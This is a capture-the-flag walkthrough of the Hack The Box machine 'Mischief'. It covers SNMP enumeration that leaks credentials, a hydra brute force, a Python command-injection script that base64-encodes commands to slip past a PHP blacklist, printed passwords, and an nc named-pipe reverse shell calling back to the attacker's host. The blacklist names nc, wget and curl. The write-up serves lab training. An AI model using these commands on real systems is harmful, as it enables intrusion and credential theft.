Description

- Name: `Mischief`

- IP: `10.10.10.92`

- Author: `trickster0`

- Difficulty: `6.4/10`

Discovery

nmap -sV -sC -Pn -p 1–65535 -T5 — min-rate 1000 — max-retries 5 10.10.10.92 PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)

| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)

|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)

3366/tcp open caldav Radicale calendar and contacts server (Python BaseHTTPServer)

| http-auth:

| HTTP/1.0 401 Unauthorized\x0D

|_ Basic realm=Test

|_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1

|_http-title: Site doesn’t have a title (text/html).

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel nmap -sV -sC -sU — top-ports 1000 10.10.10.92 PORT STATE SERVICE REASON

161/udp open snmp udp-response ttl 63

For the snmp port we runned an advanced scan:

nmap -sU -p 161 — script default,snmp-info 10.10.10.92

PORT STATE SERVICE

161/udp open snmp

| snmp-info:

| enterprise: net-snmp

| engineIDFormat: unknown

| engineIDData: b6a9f84e18fef95a00000000

| snmpEngineBoots: 19

|_ snmpEngineTime: 24m25s

| snmp-interfaces:

| lo

| IP address: 127.0.0.1 Netmask: 255.0.0.0

| Type: softwareLoopback Speed: 10 Mbps

| Traffic stats: 0.00 Kb sent, 0.00 Kb received

| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)

| IP address: 10.10.10.92 Netmask: 255.255.255.0

| MAC address: 00:50:56:b9:73:1a (VMware)

| Type: ethernetCsmacd Speed: 1 Gbps

|_ Traffic stats: 2.36 Mb sent, 17.58 Mb received

| snmp-netstat:

| TCP 0.0.0.0:22 0.0.0.0:0

| TCP 0.0.0.0:3366 0.0.0.0:0

| TCP 127.0.0.1:3306 0.0.0.0:0

| TCP 127.0.0.53:53 0.0.0.0:0

| UDP 0.0.0.0:161 *:*

| UDP 0.0.0.0:48675 *:*

|_ UDP 127.0.0.53:53 *:*

| snmp-processes:

| 1:

| Name: systemd

| Path: /sbin/init

| Params: maybe-ubiquity

| 2:

| Name: kthreadd

| 3:

| Name: kworker/0:0

| 4:

| Name: kworker/0:0H

| 5:

| Name: kworker/u2:0

| 6:

| Name: mm_percpu_wq

| 7:

| Name: ksoftirqd/0

| 8:

| Name: rcu_sched

| 9:

| Name: rcu_bh

| 10:

| Name: migration/0

| 11:

| Name: watchdog/0

| 12:

| Name: cpuhp/0

| 13:

| Name: kdevtmpfs

| 14:

| Name: netns

| 15:

| Name: rcu_tasks_kthre

| 16:

| Name: kauditd

| 17:

| Name: khungtaskd

| 18:

| Name: oom_reaper

| 19:

| Name: writeback

| 20:

| Name: kcompactd0

| 21:

| Name: ksmd

| 22:

| Name: khugepaged

| 23:

| Name: crypto

| 24:

| Name: kintegrityd

| 25:

| Name: kblockd

| 26:

| Name: ata_sff

| 27:

| Name: md

| 28:

| Name: edac-poller

| 29:

| Name: devfreq_wq

| 30:

| Name: watchdogd

| 34:

| Name: kswapd0

| 35:

| Name: ecryptfs-kthrea

| 77:

| Name: kthrotld

| 78:

| Name: acpi_thermal_pm

| 79:

| Name: scsi_eh_0

| 80:

| Name: scsi_tmf_0

| 81:

| Name: scsi_eh_1

| 82:

| Name: scsi_tmf_1

| 85:

| Name: kworker/0:2

| 89:

| Name: ipv6_addrconf

| 98:

| Name: kstrp

| 115:

| Name: charger_manager

| 164:

| Name: mpt_poll_0

| 165:

| Name: mpt/0

| 166:

| Name: kworker/0:1H

| 204:

| Name: scsi_eh_2

| 205:

| Name: scsi_tmf_2

| 206:

| Name: ttm_swap

| 208:

| Name: irq/16-vmwgfx

| 272:

| Name: raid5wq

| 323:

| Name: jbd2/sda2–8

| 324:

| Name: ext4-rsv-conver

| 372:

| Name: vmtoolsd

| Path: /usr/bin/vmtoolsd

| 373:

| Name: systemd-journal

| Path: /lib/systemd/systemd-journald

| 376:

| Name: iscsi_eh

| 390:

| Name: lvmetad

| Path: /sbin/lvmetad

| Params: -f

| 391:

| Name: systemd-udevd

| Path: /lib/systemd/systemd-udevd

| 394:

| Name: ib-comp-wq

| 396:

| Name: ib_mcast

| 397:

| Name: ib_nl_sa_wq

| 401:

| Name: rdma_cm

| 502:

| Name: systemd-network

| Path: /lib/systemd/systemd-networkd

| 509:

| Name: systemd-timesyn

| Path: /lib/systemd/systemd-timesyncd

| 515:

| Name: systemd-resolve

| Path: /lib/systemd/systemd-resolved

| 539:

| Name: systemd-logind

| Path: /lib/systemd/systemd-logind

| 540:

| Name: networkd-dispat

| Path: /usr/bin/python3

| Params: /usr/bin/networkd-dispatcher

| 541:

| Name: lxcfs

| Path: /usr/bin/lxcfs

| Params: /var/lib/lxcfs/

| 544:

| Name: atd

| Path: /usr/sbin/atd

| Params: -f

| 547:

| Name: VGAuthService

| Path: /usr/bin/VGAuthService

| 548:

| Name: accounts-daemon

| Path: /usr/lib/accountsservice/accounts-daemon

| 549:

| Name: cron

| Path: /usr/sbin/cron

| Params: -f

| 550:

| Name: dbus-daemon

| Path: /usr/bin/dbus-daemon

| Params: — system — address=systemd: — nofork — nopidfile — systemd-activation — syslog-only

| 553:

| Name: cron

| Path: /usr/sbin/CRON

| Params: -f

| 559:

| Name: rsyslogd

| Path: /usr/sbin/rsyslogd

| Params: -n

| 560:

| Name: snmpd

| Path: /usr/sbin/snmpd

| Params: -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f

| 573:

| Name: sh

| Path: /bin/sh

| Params: -c /home/loki/hosted/webstart.sh

| 574:

| Name: polkitd

| Path: /usr/lib/policykit-1/polkitd

| Params: — no-debug

| 575:

| Name: sh

| Path: /bin/sh

| Params: /home/loki/hosted/webstart.sh

| 589:

| Name: python

| Path: python

| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki — dir /home/loki/hosted/

| 652:

| Name: sshd

| Path: /usr/sbin/sshd

| Params: -D

| 663:

| Name: iscsid

| Path: /sbin/iscsid

| 664:

| Name: iscsid

| Path: /sbin/iscsid

| 723:

| Name: mysqld

| Path: /usr/sbin/mysqld

| Params: — daemonize — pid-file=/run/mysqld/mysqld.pid

| 727:

| Name: agetty

| Path: /sbin/agetty

| Params: -o -p — \u — noclear tty1 linux

| 777:

| Name: apache2

| Path: /usr/sbin/apache2

| Params: -k start

| 779:

| Name: apache2

| Path: /usr/sbin/apache2

| Params: -k start

| 780:

| Name: apache2

| Path: /usr/sbin/apache2

| Params: -k start

| 781:

| Name: apache2

| Path: /usr/sbin/apache2

| Params: -k start

| 782:

| Name: apache2

| Path: /usr/sbin/apache2

| Params: -k start

| 783:

| Name: apache2

| Path: /usr/sbin/apache2

| Params: -k start

| 1051:

| Name: kworker/u2:1

| 1070:

|_ Name: kworker/u2:2

| snmp-sysdescr: Linux Mischief 4.15.0–20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64

|_ System uptime: 24m26.08s (146608 timeticks)

| snmp-win32-software:

| accountsservice-0.6.45–1ubuntu1; 0–01–01T00:00:00

| acl-2.2.52–3build1; 0–01–01T00:00:00

| […]

| xxd-2:8.0.1453–1ubuntu1; 0–01–01T00:00:00

| xz-utils-5.2.2–1.3; 0–01–01T00:00:00

| zerofree-1.0.4–1; 0–01–01T00:00:00

|_ zlib1g-1:1.2.11.dfsg-0ubuntu2; 0–01–01T00:00:00

Pwn

Loki

Accessing the port 3366 via browser we are asked to insert some HTTP credentials.

From the SNMP scan we found that the PID 589 is associated to a Python script:

| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki — dir /home/loki/hosted/

The process simply spawns a HTTP server on port 3366 with user “loki” and password “godofmischiefisloki”.

Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Devices that typically support SNMP include cable modems, routers, switches, servers, workstations, printers, and more.

SNMP is widely used in network management for network monitoring. SNMP exposes management data in the form of variables on the managed systems organized in a management information base (MIB) which describe the system status and configuration. These variables can then be remotely queried (and, in some circumstances, manipulated) by managing applications.

Using those credentials we can login on port 3366.

From the main page we found another pair of credentials:

loki godofmischiefisloki

loki trickeryanddeceit

From `snmp-netstat` we saw that there are other ports open bind to *:*

| snmp-netstat:

| TCP 0.0.0.0:22 0.0.0.0:0

| TCP 0.0.0.0:3366 0.0.0.0:0

| TCP 127.0.0.1:3306 0.0.0.0:0

| TCP 127.0.0.53:53 0.0.0.0:0

| UDP 0.0.0.0:161 \*:\*

| UDP 0.0.0.0:48675 \*:\*

| UDP 127.0.0.53:53 \*:\*

|

so with snmpwalk to extend our analysis on the service returns 2 IPv6 addresses.

snmpwalk -v 2c -c public 10.10.10.92

(very long output and scan)

Se found also the IPv6s of the machine:

dead:beef:0000:0000:0250:56ff:feb9:731a

fe80:0000:0000:0000:0250:56ff:feb9:731a

a NMAP scan founds an Apache server on port 80 running on the ipv6.

nmap -p 1–65535 -Pn -sV -T4 -6 dead:beef:0000:0000:0250:56ff:feb9:731a

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The page asks for a login and no know vulnerabilities were found on the form so we started `hydra` with usernames from `namelist.txt` (from `metasploit`) and passwords:

godofmischiefisloki

trickeryanddeceit

The program returned a pair of credentials:

Hydra v8.6 © 2017 by van Hauser/THC — Please do not use in military or secret service organizations, or for illegal purposes.

[DATA] max 64 tasks per 1 server, overall 64 tasks, 22908 login tries (l:1909/p:12), ~358 tries per task

[DATA] attacking http-post-form://mischief.htb:80//login.php:user=^USER^&password=^PASS^:Sorry, those credentials do not match

[80][http-post-form] host: mischief.htb login: administrator password: trickeryanddeceit Hydra ( http://www.thc.org/thc-hydra ) starting at 2018–09–21 17:33:47[DATA] max 64 tasks per 1 server, overall 64 tasks, 22908 login tries (l:1909/p:12), ~358 tries per task[DATA] attacking http-post-form://mischief.htb:80//login.php:user=^USER^&password=^PASS^:Sorry, those credentials do not match[80][http-post-form] host: mischief.htb login: administrator password: trickeryanddeceit

The web form simply execute every command insert but some of them are blacklisted, we can use:

- cat

- echo

- ping

- tar

- sh

- source

- sleep

- id

- whoami

- python

but the main problem is that we don’t have any output.

After many tries we found that we can have the output of the command only if we add another command:

curl -X POST http://mischief.htb/ — data=”command= ; ”` will prints the output of `

N.B.: `mischief.htb` is simply a /etc/hosts binding for the IPv6 address

curl -X POST http://mischief.htb/ Cookie:”PHPSESSID=0shjckk27ntheutfa7gpko3763" — data "command=cat /etc/passwd;id"

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

syslog:x:102:106::/home/syslog:/usr/sbin/nologin

messagebus:x:103:107::/nonexistent:/usr/sbin/nologin

_apt:x:104:65534::/nonexistent:/usr/sbin/nologin

lxd:x:105:65534::/var/lib/lxd/:/bin/false

uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin

dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin

landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin

pollinate:x:109:1::/var/cache/pollinate:/bin/false

sshd:x:110:65534::/run/sshd:/usr/sbin/nologin

loki:x:1000:1004:loki:/home/loki:/bin/bash

Debian-snmp:x:111:113::/var/lib/snmp:/bin/false

mysql:x:112:115:MySQL Server,,,:/nonexistent:/bin/false

We wrote a simple script to interact with the machine:

import requests

from sys import argv

url = “ url = “ http://dead:beef:0000:0000:0250:56ff:feb9:731a/ url = “ http://mischief.htb/ command = “ “.join(argv[1:])

command += “;id”

r = requests.post(url, data={“command”: command}) print(r.text.split(“</html>”)[1].strip())

And we first exilfrated MySQL credentials:

$server = ‘localhost’;

$username = ‘debian-sys-maint’;

$password = ‘nE1S9Aw1L0Ky3Y9h’;

$database = ‘dbpanel’;

Since we can’t use `ls` we need to find escape the shell constraints.

Searching for escaping techiniques we found that we can base64-encode a command and the issue the command

echo -n "<aBase64String>|base64 -d|sh"

to actually run the command on the remote machine.

import requests

from base64 import b64encode

from sys import argv

url = url = "http://dead:beef:0000:0000:0250:56ff:feb9:731a/" url = "http://mischief.htb/" command = " ".join(argv[1:])

command = "echo -n "+ b64encode(

command.encode()).decode() + "|base64 -d|sh"

command += ";id"

r = requests.post(url, data={"command": command}) print(r.text.split("</html>")[1].strip())

Now we can run all shell commands!

In /home/loki we found a credentials file (`user.txt` is not readable from www-data):

python cmd_loki.py "cat /home/loki/credentials"

pass: lokiisthebestnorsegod

Command was executed succesfully!

We can now login with SSH a loki and get the user flag:

User flag

Running LinEnum it did not show something exploitable and now known exploits exist for the kernel `4.15.0–20` so we focused the scan on known services that could hide some credentials/informations.

From MySQL:

mysql> show databases;

+ — — — — — — — — — — +

| Database |

+ — — — — — — — — — — +

| information_schema |

| dbpanel |

| mysql |

| performance_schema |

| sys |

+ — — — — — — — — — — +

5 rows in set (0.00 sec) mysql> use dbpanel;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A Database changed

mysql> show tables;

+ — — — — — — — — — -+

| Tables_in_dbpanel |

+ — — — — — — — — — -+

| users |

+ — — — — — — — — — -+

1 row in set (0.00 sec) mysql> select * from users;

+ — — + — — — — — — — -+ — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — +

| id | user | password |

+ — — + — — — — — — — -+ — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — +

| 2 | administrator | $2y$10$0OeEYPgdvzU1XTLsKUkaIuyN3PTBQSC4oALTICEZOllPJKq1uUAkq |

+ — — + — — — — — — — -+ — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — +

1 row in set (0.00 sec) # trickeryanddeceit

and from .mysql_history:

_HiStOrY_V2_

yse\040mysql;

use\040mysql;

SELECT\040User,\040Host,\040plugin\040FROM\040mysql.user;

FLUSH\040PRIVILEGES;

exit

From /var/www/html/index.php we have the list of blacklisted commands and it’s possible to understand why we need to supply two commands to see the output:

if(isset($_POST[‘command’])) {

$cmd = $_POST[‘command’];

if (strpos($cmd, “nc” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “bash” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “chown” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “setfacl” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “chmod” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “perl” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “find” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “locate” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “ls” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “php” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “wget” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “curl” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “dir” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “ftp” ) !== false){

echo “Command is not allowed.”;

} elseif (strpos($cmd, “telnet” ) !== false){

echo “Command is not allowed.”;

} else {

system(“$cmd > /dev/null 2>&1”);

echo “Command was executed succesfully!”;

}

}

From loki’s bash history we found that he executed `sudo su`, `su` and `sudo -l` but now those commands returns

bash: /usr/bin/sudo: Permission denied

python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery

exit

free -mt

ifconfig

cd /etc/

sudo su

su

exit

su root

ls -la

sudo -l

ifconfig

id

cat .bash_history

nano .bash_history

exit

Since we know that there is `sudo` involed we returned to `www-data` and spawned a reverse shell (using IPv6) using our RCE:

python cmd_loki.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc dead:beef:X::XXXX 4444 >/tmp/f"

from `www-data` we can use `su` and bruteforce the passwords that we found since now we get root!

Where is root flag?

Using find the root flag is found.

Root Flag

https://www.hackthebox.eu/profile/1752